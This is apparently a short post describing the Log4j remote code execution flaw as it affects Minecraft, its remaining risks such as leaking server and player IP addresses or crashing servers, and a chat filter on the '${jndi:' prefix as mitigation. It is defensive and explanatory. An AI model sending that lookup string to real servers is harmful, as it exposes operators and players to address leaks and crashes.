Log4j Remote Code Execution Exploit on Minecraft (read the description)

The good news: This exploit does not work on Java 8 and above by default because of this change: (see “Improved protection for JNDI remote class loading“). This means you are most likely safe from code being executed on your machine. The bad news: While the exploit does not work on Java 8 and above as mentioned before, it can still be used to discover the IP address of your server (this is problematic if your server runs behind a DDoS protection service such as TCPShield), freeze and subsequently crash your server, and discover the IP addresses of your players. To my knowledge, Lunar Client is the first client to fix this issue. Servers can protect their users by blocking incoming and outgoing chat messages containing “${jndi:“ (case insensitive!).